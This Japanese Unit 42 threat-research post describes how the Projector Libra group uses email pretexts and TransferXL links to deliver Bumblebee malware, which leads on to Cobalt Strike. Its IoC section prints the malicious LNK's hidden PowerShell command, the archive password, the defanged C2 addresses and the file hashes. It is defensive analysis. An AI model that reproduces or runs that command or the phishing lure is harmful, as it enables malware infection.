Protect Against Russia-Ukraine Cyber Activity

Bumblebeeの飛翔: メールのやりとりから始まるファイル共有サービスを悪用したマルウェア感染

Conceptual image representing phishing, including the way Bumblebee malware is distributed, as discussed here

This post is also available in: English (英語)

概要

Bumblebeeマルウェアを拡散する脅威アクターグループProjector Libraは、EXOTIC LILYとも呼ばれ、標的組織とメールで直接やりとりした後、ファイル共有サービスを利用してマルウェアを拡散する犯罪グループで、ランサムウェア「Conti」に関係する初期アクセスブローカーとして報告されています。

本稿では、Projector Libraによって拡散され、Cobalt Strikeの感染へと発展した、Bumblebee(マルハナバチの意)マルウェアの最近のアクティビティに関するケーススタディをご紹介します。以下に示す情報は、この犯罪グループが用いる手口の全体像について詳述し、セキュリティ担当者がこの脅威に対する組織の防御を強化できるようにするためのものです。

パロアルトネットワークスのお客様は、WildFire脅威防御のサブスクリプションを有効化した次世代ファイアウォール Cortex XDRによってBumblebeeから保護されています。

観測されたテクニックやそれに対応してとるべき行動指針全体(CoA)、本稿に関連する侵害指標(IoC)を視覚化した内容についてはUnit 42のATOMビューアからご確認ください。

本稿で解説する主なマルウェア Bumblebee
本稿で解説する主な脅威アクター Projector Libra/EXOTIC LILY
影響を受けるオペレーティングシステム Windows
Unit 42の関連トピック malwarephishing

目次

BazarLoaderの後継「Bumblebee」
脅威アクター「Projector Libra」の手口
メールメッセージの例
マルウェアと感染後のトラフィック
結論
IoC
追加リソース

BazarLoaderの後継「Bumblebee」

Bumblebeeマルウェアは、2022年2月にBazarLoaderの後継として登場しました。以降、それまでBazarLoaderを拡散していたキャンペーンは、代わりにBumblebeeを拡散するようになっています。

2020年4月にはBumblebeeの前身が初めて観測されており、Trickbotの影の開発者が新しいマルウェア「BazarBackdoor」をリリースしたのがこの時期です。このマルウェアのローダーコンポーネントはBazarLoaderと呼ばれ、2020年から2021年を通じて弊社の脅威概況において要注意の脅威の1つでした。

2021年夏に拡散がピークに達したBazarLoaderは、少なくとも3つのキャンペーンによってそのサンプルの大半が配布されました。それらのキャンペーン/脅威アクターは、TA551 (Shathak)、TA578 (Contact Forms/Stolen Images Evidence)、および「BazarCall」と呼ばれるコールセンターを使ったキャンペーンです。

BazarLoaderは2022年2月まで活動が見られましたが、それ以降新たに作られたサンプルは発見されていません。2022年3月以降、BazarLoaderを拡散していたProjector Libraなどの脅威アクターは、代わりに「Bumblebee」という新しいマルウェアファミリを配布するようになりました。セキュリティリサーチャーがこのマルウェアをBumblebeeと呼ぶようになったのは、感染後のHTTPSトラフィックで生成されるUser-Agent文字列に「bumblebee」が使われるためです。

TA578などの脅威アクターは、かつてBazarLoaderまたはIcedID (Bokbot)マルウェアのいずれかを拡散していましたが、2022年3月以降、BazarLoaderは配布しなくなりました。たとえば、TA578が現在配布しているのは、BumblebeeIcedIDのいずれかです。

マルウェアの拡散パターンから、BazarLoaderの配布が止まる一方でBumblebeeの拡散は続いていることがわかっています。それにはCobalt Strikeなどのフォローアップマルウェアが含まれ、場合によってはランサムウェアの感染につながる恐れがあります。

脅威アクター「Projector Libra」の手口

GoogleのThreat Analysis Group (TAG)が以前にこの脅威アクターの攻撃チェーンの全貌を明らかにしましたが、本稿で取り上げる事例では、最初に脅威アクターが標的とされた被害者に連絡をとるところから始まります。

Projector Libraがメールで被害者メールとのやりとりを試みる
図1. 本ケーススタディの一連のイベント。

被害者が最初のメールに返信すると、Projector Libraは「その件に関するファイルを共有するため、あるファイル共有サービスから別途メールを送信した」と返信してきます。次に被害者は当該のファイル共有サービスが生成したメールを受信します。これらのメールには、先述のProjector Libraからのメッセージで言及されたファイルに見せかけたマルウェアのホスト先リンクが含まれています。

2022年以降、Projector Libraが配布するファイルはISOイメージになっています。これらのイメージは脆弱なWindowsホストへの感染を目的にしています。このISOイメージにはWindowsショートカットが含まれていて、そのなかで隠されたBumblebeeマルウェアが実行されるよう設計されています。

場合によっては、ISOイメージにBumblebeeの隠しDLLファイルを実行するWindowsショートカット(.LNKファイル)が含まれていることもあります。

このほか、ISOイメージにパスワードで保護された7-Zipアーカイブ(.7Zファイル)内に格納する形でBumblebeeのDLLファイルが含まれている場合もあります。このようなケースでは、LNKファイルによって7-Zipスタンドアロンコンソールの隠しコピーが実行され、そのパスワードで保護された7ZファイルからBumblebeeが抽出されます。

Active Directory (AD)環境では、最初のBumblebeeの感染がCobalt Strikeの感染へと発展します。攻撃者はCobalt Strikeを使って被害環境をマッピングします。その結果、標的の価値が高いことがわかれば、攻撃者がラテラルムーブメント(侵入後の横展開)を試み、ContiDiavolといったランサムウェアをドロップします。

メールメッセージの例

ケーススタディの最初のイベントは、2022年5月5日にProjector Libraから送信された最初のメールです。米国の地元ガス会社に勤めるAndresという名の従業員になりすましたものです。

図2に、この最初のメールのスクリーンショットを示します。

2022年5月5日にProjector Libraから送信された最初のメールのスクリーンショット。米国の地元ガス会社に勤めるAndresという名の従業員になりすましたメールの本文で、NDAへの署名が必要であるとしながら、その文書例の送信も併せて提案しています。
図2. やりとりを試みるProjector Libraからのメール。

上の図2に示したメールに被害者が返信すると、Projector Libraは次の図3に示したメールで返信しました。この返信には、ドキュメントをTransferXLから別メールで送信したと書かれています。

被害者メールから図2に示したメールへの返信を受け取ると、Projector Libraはこの図に示したメールで返信しました。このメールでは、受信者にNDAへの署名は必要ないと伝える一方で、作業範囲記述書をTransferXLから別のメールで送信したと書かれています。そして受信者に、そのファイルの受領確認を返信したうえで、電話での打ち合わせの前にファイルに目を通すよう求めています。
図3. 被害者メールが最初のメールに返信した後のProjector Libraからの返信。

TransferXLは無料プランのある正規ファイル共有サービスで、Projector Libraのような犯罪グループによって頻繁に悪用される、数ある無料プラン付きファイル共有サービスの1つです。それらのTransferXLのURLは1週間で有効期限が切れるため、セキュリティリサーチャーからマルウェアを隠すのに好都合といえます。以下の図4は、Projector Libraが配布するマルウェアを共有するための、本ケーススタディのTransferXLのメールを示しています。

Projector Libraから送信されたTransferXLメールのスクリーンショット。赤い矢印はダウンロードボタンを指しており、ダウンロードファイルの保存先を示すリンクが赤色で記載されています。
図4. Projector Libraからのマルウェアを共有するためのTransferXLによって生成されたメール。

マルウェアと感染後のトラフィック

TransferXLから共有されたファイルは圧縮され、ZIPアーカイブとして送信されます。図5は、本ケーススタディのTransferXLのURLがWebブラウザで開かれ、Projector Libraが配布するマルウェアがダウンロードされる流れを示しています。

このスクリーンショットは、本ケーススタディのTransferXLのURLがWebブラウザで開かれ、Projector Libraが配布するマルウェアがダウンロードされる流れを示しています。赤い矢印は、ユーザーにマルウェアを開くまたは保存する操作を促すポップアップを指しています。
図5. Projector Libraが配布するマルウェアを送信するTransferXLのURL。

受信者はTransferXLのZIPアーカイブからISOファイルを抽出します。Microsoft WindowsをはじめとするほとんどのGUIベースのデスクトップ環境では、ISOファイルをダブルクリックするとそれが新しいドライブとしてマウントされます。Windows 10では、ダウンロードしたISOは、図6のDVDドライブE:と同様にDVDドライブとしてマウントされます。

この図は、マルウェアが含まれたzip形式のフォルダから、ISOファイル、そしてISOの内容(Windows 10でDVDドライブE:としてマウントされる)までの一連のイベントを示しています。ISOには赤い矢印で示された隠しファイルが含まれています。また、Attachments.lnkと呼ばれるWindowsショートカットも含まれています。これは画像下部に示したPowerShellコマンドを実行するものです。
図6. ダウンロードしたISOはWIndows 10でDVDドライブE:としてマウントされる。

上の図6のように、ダウンロードしたISOファイルにはAttachments.lnkという名前のWindowsショートカットが含まれます。Microsoft Windowsでは、エクスプローラーでファイル拡張子が表示されるように設定していても、.lnkファイル拡張子は表示されません。

Attachments.lnkによって、7za.exeという名前の7-Zipスタンドアロン コンソール ファイルのコピーを実行するためのPowerShellコマンドが実行されます。上の図6は、Attachments.lnkのPowerShellコマンド全体を示しています。

7za.exeによって、パスワードで保護されたarchive.7zという名前の7-ZipアーカイブからBumblebeeマルウェアのDLLファイルが抽出されます。7za.exearchive.7zはどちらも非表示ですが、エクスプローラーで隠しファイルが表示されるように設定すれば表示できます。

以下の図7のように、抽出したBumblebee DLLファイルはC:\ProgramData\19a.dllに保存されます。BumblebeeのDLLファイルは、エントリポイントとしてrundll32oxgdXPSGPwを使って実行されます。

抽出したBumblebeeのDLLファイルはC:\ProgramData\19a.dllに保存されます。この図では、BumblebeeのDLLファイルが大きな赤い矢印で示されています。
図7 抽出したBumblebeeマルウェアのDLLファイルはディスクに保存される。

この感染で生成されるトラフィックはすべてHTTPSです。以下の図8は、この感染に使われたTransferXL URLをWiresharkでフィルタリングした結果を示しています。ISOがマウントされ、Bumblebeeが実行されると、BumblebeeのHTTPS C2トラフィックが54.38.139[.]20:443で確認されました。

Wiresharkでフィルタリングした感染トラフィック 1つの矢印はTransferXLのメールからのリンクを指し、もう1つはBumblebeeのC2トラフィックの開始点を指しています。
図8 Wiresharkでフィルタリングした感染トラフィック

以下の図9のように、BumblebeeのC2トラフィックの開始から約15分後、45.153.243[.]142:443fuvataren[.]comを使用するCobalt Strikeアクティビティが確認されました。

感染時に確認されたCobalt Strikeのトラフィック。黒い矢印は、Cobalt Strikeのトラフィックの開始点を示しています。
図9 感染時に確認されたCobalt Strikeのトラフィック。

この事例とラボでのテストで、Bumblebeeの感染はたびたびCobalt Strikeアクティビティへと発展していました。Unit 42はTwitterの@Unit42_IntelハンドルからBumblebee感染によるCobalt Strikeアクティビティを以下のツイートで報告しています。

標的となった環境の価値が高い場合、さらなるアクティビティに加え、ラテラルムーブが確認される場合もあります。ただし本ケーススタディでは魅力的な標的を用意しなかったため、Cobalt Strikeのトラフィックは1時間11分後に突然終了しました。

結論

Bumblebeeは現在、かつてBazarLoaderを配布していたProjector Libraをはじめとする脅威アクターによって拡散されています。Projector Libraは、TransferXLなどのファイル共有サービスを使ってマルウェアを送信する前に、被害者メールとやりとりする高度なキャンペーンを展開します。

現在、Projector Libraのマルウェアは、BumblebeeマルウェアをインストールするためのWindowsショートカットと隠しファイルを含むISOイメージで構成されています。Bumblebeeは、Windowsホストに感染することを目的としています。AD環境ではCobalt Strike感染へ発展することが多く、そこからより深刻なランサムウェア感染につながるおそれがあります。

本ケーススタディは、Projector LibraのBumblebeeマルウェアが被害者目線でどのように見えるのかを示しており、セキュリティ担当者がこの脅威をより深く理解し、組織を守るうえで役立つことでしょう。

Windowsユーザーは、スパムフィルタリングと適切なシステム管理、そしてソフトウェアにパッチを適用して最新の状態を保つようにすることで、Bumblebeeマルウェアのリスクを防止できます。またパロアルトネットワークスのお客様は、Cortex XDR次世代ファイアウォールWildFire脅威防御サブスクリプションと組み合わせることでBumblebeeに対するさらなる保護が得られます。

侵害の懸念があり弊社にインシデントレスポンスに関するご相談をなさりたい場合は、infojapan@paloaltonetworks.com までメールにてご連絡いただくか、下記の電話番号までお問い合わせください(ご相談は弊社製品のお客様には限定されません)。

  • 北米フリーダイヤル: 866.486.4842 (866.4.UNIT42)
  • 欧州: +31.20.299.3130
  • アジア太平洋: +65.6983.8730
  • 日本: +81.50.1790.0200

パロアルトネットワークスはファイルサンプルや侵害の兆候などを含むこれらの調査結果をCyber Threat Alliance (CTA サイバー脅威アライアンス)のメンバーと共有しました。CTAのメンバーはこのインテリジェンスを使用して、お客様に保護を迅速に提供し、悪意のあるサイバー攻撃者を体系的に阻害することができます。詳細については Cyber Threat Alliance からご覧ください。

IoC

TransferXLのメールのリンクからダウンロードされた悪意のあるZIPアーカイブ:

SHA256ハッシュ: 58b9a5202a3cc96e86e24cd3c4b797d2efbf7d6b52461eef89b045aa1ff6c6ae
ファイルサイズ: 1,002,214バイト
ファイルの場所: hxxps://www.transferxl[.]com/download/00jJFzX0NZqb7p?utm_source=downloadmail&utm_medium=e-mail
注記: このファイルは2022年5月26日まで提供されていましたが、その後ファイル共有サービスによって自動的に削除されました。

上記のzipアーカイブから抽出されたISOイメージ:

SHA256ハッシュ: 9be296fc9b23ad6aed19934123db9c3a2406d544156b7768374e0f9a75eb1549
ファイルサイズ: 1,333,248バイト
ファイル名: SOW_2.iso

上記のISOイメージの内容:

SHA256ハッシュ: a10291506b884327307ae6d97dd6c043e9f2b6283ca3889dc2f5936fb2357862
ファイルサイズ: 1,604バイト
ファイル名: Attachments.lnk
ファイルの説明: ISOイメージに含まれるWindowsショートカット
ショートカット: C:\Windows\System32\cmd.exe /c powershell -WindowStyle Hidden -Command ".\7za.exe x archive.7z -pFhu$$57csa -o\"c:\programdata\" -y > $null; rundll32 c:\programdata\19a.dll,oxgdXPSGPw

SHA256ハッシュ: c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf
ファイルサイズ: 643,147バイト
ファイル名: 7za.exe
ファイルの説明: ISOイメージに含まれる7-Zipスタンドアロンコンソールのコピー(有害でない)

SHA256ハッシュ: e62b9513784ae339351de089dd356742aa1c95971ad8c0cf126f4e72131df96e
ファイルサイズ: 690,970バイト
ファイル名: archive.7z
ファイルの説明: パスワードで保護された7-Zipアーカイブであり、BumblebeeマルウェアのDLLファイルを含む
パスワード: Fhu$$57csa

SHA256ハッシュ: 024d048f8ce81e8784215dc6cf0e170b02307d9e8624083efdfccaf3e269a0f2
ファイルサイズ: 1,174,016バイト
ファイルの場所: C:\ProgramData\19a.dll
ファイルの説明: 7-Zipアーカイブから抽出されたBumblebeeマルウェアの64ビット版DLLファイル
実行方法: rundll32.exe [filename], oxgdXPSGPw

BumblebeeのC2トラフィック:

54.38.139[.]20:443 - HTTPSトラフィック

Cobalt StrikeのC2トラフィック:

45.153.243[.]142:443 - fuvataren[.]com - HTTPSトラフィック

追加リソース

Bumblebeeマルウェアに関する追加情報:

New Bumblebee malware replaces Conti's BazarLoader in cyberattacks - BleepingComputer
Adventures in the land of BumbleBee – a new malicious loader - NCC Group
This isn't Optimus Prime's Bumblebee but it's Still Transforming - Proofpoint
The chronicles of Bumblebee: The Hook, the Bee, and the Trickbot connection - Eli Salem氏のブログ記事
2022-04-05 - Cobalt Strike from Bumblebee infection - @Unit42_IntelによるTwitter投稿
2022-05-03 - Cobalt Strike from Bumblebee infection - @Unit42_IntelによるTwitter投稿
2022-05-31 - Cobalt Strike from Bumblebee infection - @Unit42_IntelによるTwitter投稿
2022-06-09 - Cobalt Strike from Bumblebee infection - @Unit42_IntelによるTwitter投稿
2022-06-14 - Cobalt Strike from Bumblebee infection - @Unit42_IntelによるTwitter投稿

Projector Libraの活動に関する追加情報:

Exposing initial access broker with ties to Conti - Threat Analysis Group (TAG)
Bumblebee Malware from TransferXL URLs - Internet Storm Center
EXOTIC LILY activity pushing Bumblebee on 2022-03-28 - @BushidoTokenによるTwitter投稿
Bumblebee activity on 2022-05-11 - @k3dg3によるTwitter投稿
Bumblebee activity on 2022-05-16 - @k3dg3によるTwitter投稿
Bumblebee activity on 2022-05-24 - @k3dg3によるTwitter投稿
Bumblebee activity on 2022-06-14 - @k3dg3によるTwitter投稿

2022-08-10 16:30 JST 英語版更新日 2022-08-03 19:30 PDT の内容を反映